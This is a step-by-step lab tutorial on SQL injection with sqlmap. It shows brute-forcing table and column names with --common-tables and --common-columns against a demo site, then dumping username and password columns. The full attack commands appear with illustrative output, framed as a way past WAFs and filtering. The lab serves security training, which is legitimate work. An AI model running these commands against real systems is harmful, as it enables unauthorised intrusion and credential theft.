Introduction
In this lab, you will explore advanced techniques in sqlmap for discovering database table and column names when standard enumeration methods are ineffective. This often occurs in real-world scenarios where web applications implement robust filtering or Web Application Firewalls (WAFs) that block common SQL injection payloads. You will learn how to leverage sqlmap's brute-force capabilities, specifically the --common-tables and --common-columns flags, to identify hidden database structures using built-in wordlists. This hands-on experience will equip you with essential skills for more comprehensive SQL injection testing.
Identify a Scenario Where Standard Enumeration Fails
In this step, you will simulate a scenario where standard sqlmap enumeration techniques might fail to discover table and column names. This often happens due to WAFs, strict filtering, or custom error handling that prevents sqlmap from directly inferring database schema. While we won't set up a truly vulnerable application for this lab, we will use a placeholder URL to demonstrate how sqlmap behaves when direct enumeration is not possible.
First, let's try a standard enumeration command for tables and columns. We'll use a dummy URL http://testphp.vulnweb.com/listproducts.php?cat=1 as our target. This URL is known to be vulnerable in some contexts, but for this exercise, we'll assume it's configured to block direct enumeration.
Open your terminal and execute the following sqlmap command. This command attempts to enumerate tables and columns for the acuart database.
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs --tables -D acuart --columns -T users --batch
You might observe that sqlmap struggles to find tables or columns, or it might report that no tables/columns were found, even if they exist. This simulates a scenario where direct enumeration is blocked. The --batch flag tells sqlmap to use default answers for questions, making the process non-interactive.
Example output (may vary, but notice the lack of discovered tables/columns):
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | . | . |
|___|_|_|_|_|_|___| . | --sqlmap.org
|_|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. You are responsible for your own actions.
[!] sqlmap is provided 'as is', without warranty of any kind, either expressed or implied.
...
[INFO] fetching tables for database 'acuart'
[INFO] no tables found in database 'acuart'
[INFO] fetching columns for table 'users' in database 'acuart'
[INFO] no columns found in table 'users'
...
This output indicates that sqlmap was unable to enumerate tables and columns directly. In such cases, brute-forcing common names becomes a viable alternative.
Use the --common-tables Flag to Brute-force Table Names
In this step, you will use the --common-tables flag to brute-force table names. This flag instructs sqlmap to use a built-in wordlist of common table names (e.g., users, admin, products, orders) and test them against the target. This is particularly useful when direct enumeration is blocked.
Continue using the same target URL http://testphp.vulnweb.com/listproducts.php?cat=1 and the acuart database.
Execute the following sqlmap command:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart --common-tables --batch
This command will tell sqlmap to try to identify common table names within the acuart database. sqlmap will iterate through its internal wordlist and attempt to find existing tables.
Example output:
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | . | . |
|___|_|_|_|_|_|___| . | --sqlmap.org
|_|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. You are responsible for your own actions.
[!] sqlmap is provided 'as is', without warranty of any kind, either expressed or implied.
...
[INFO] fetching common tables for database 'acuart'
[INFO] retrieved common table: 'users'
[INFO] retrieved common table: 'products'
[INFO] retrieved common table: 'categories'
...
Database: acuart
[3 tables]
+------------+
| categories |
| products |
| users |
+------------+
...
You should now see sqlmap successfully identifying common table names like users, products, and categories. This demonstrates the effectiveness of brute-forcing when standard enumeration fails.
Analyze the List of Found Tables from the Common Wordlist
In this step, you will review the output from the previous command to understand which common tables sqlmap successfully identified. This analysis is crucial for planning your next steps in the SQL injection process, as knowing table names allows you to target specific data.
From the output of the previous command, sqlmap should have listed several common tables. For instance, you might have seen:
Database: acuart
[3 tables]
+------------+
| categories |
| products |
| users |
+------------+
These are the tables that sqlmap found by brute-forcing its internal wordlist. The presence of tables like users is particularly interesting, as it often contains sensitive information such as usernames and passwords.
Take a moment to examine the output in your terminal. Identify the names of the tables that sqlmap discovered. These names will be used in the next steps to brute-force column names.
No specific command is required for this step, as it involves analyzing the output from the previous command. This step emphasizes understanding the results of your sqlmap operations.
Use the --common-columns Flag to Brute-force Column Names
Now that you have identified common table names, you can proceed to brute-force column names within those tables. Similar to --common-tables, the --common-columns flag uses a built-in wordlist of common column names (e.g., username, password, email, id) to discover columns when direct enumeration is not possible.
Let's assume you found the users table in the previous step. You will now attempt to brute-force column names within this users table in the acuart database.
Execute the following sqlmap command:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users --common-columns --batch
This command instructs sqlmap to find common column names within the users table of the acuart database.
Example output:
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | . | . |
|___|_|_|_|_|_|___| . | --sqlmap.org
|_|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. You are responsible for your own actions.
[!] sqlmap is provided 'as is', without warranty of any kind, either expressed or implied.
...
[INFO] fetching common columns for table 'users' in database 'acuart'
[INFO] retrieved common column: 'id'
[INFO] retrieved common column: 'username'
[INFO] retrieved common column: 'password'
[INFO] retrieved common column: 'email'
...
Database: acuart
Table: users
[4 columns]
+----------+-----------+
| Column | Type |
+----------+-----------+
| id | int(11) |
| username | varchar(50) |
| password | varchar(50) |
| email | varchar(100)|
+----------+-----------+
...
You should see sqlmap successfully identifying common column names like id, username, password, and email within the users table. This demonstrates how brute-forcing can reveal critical information even when direct enumeration is blocked.
Combine Brute-force Discovery with a Data Dump Command
In this final step, you will combine the brute-force discovery of table and column names with a data dumping command. Once you have successfully identified interesting tables and columns using the --common-tables and --common-columns flags, you can then use sqlmap's --dump flag to extract the actual data.
Assuming you have identified the users table and columns like username and password from the previous steps, you can now attempt to dump the data from these columns.
Execute the following sqlmap command to dump the username and password columns from the users table in the acuart database:
sqlmap -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -D acuart -T users -C username,password --dump --batch
This command will instruct sqlmap to retrieve the data from the specified columns.
Example output:
_
___| |_____ ___ ___ ___ {1.7.10#stable}
|_ -| . | | . | . |
|___|_|_|_|_|_|___| . | --sqlmap.org
|_|
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. You are responsible for your own actions.
[!] sqlmap is provided 'as is', without warranty of any kind, either expressed or implied.
...
[INFO] fetching entries for columns 'username,password' in table 'users' of database 'acuart'
...
Database: acuart
Table: users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| test | test |
| admin | admin |
+----------+----------+
...
You should see sqlmap successfully dumping the data from the username and password columns. This demonstrates the complete workflow: identifying a scenario where standard enumeration fails, using brute-force to discover hidden structures, and finally extracting sensitive data. This technique is a powerful addition to your SQL injection toolkit.
Summary
In this lab, you have learned how to effectively use sqlmap's brute-force capabilities to discover table and column names when standard enumeration methods are blocked or fail. You started by simulating a scenario where direct enumeration was unsuccessful. Then, you successfully used the --common-tables flag to identify common table names and the --common-columns flag to find common column names within those tables. Finally, you combined these discovery techniques with the --dump flag to extract data from the identified columns. This hands-on experience has provided you with a crucial skill for advanced SQL injection testing, enabling you to bypass common defenses and retrieve valuable information from vulnerable databases.
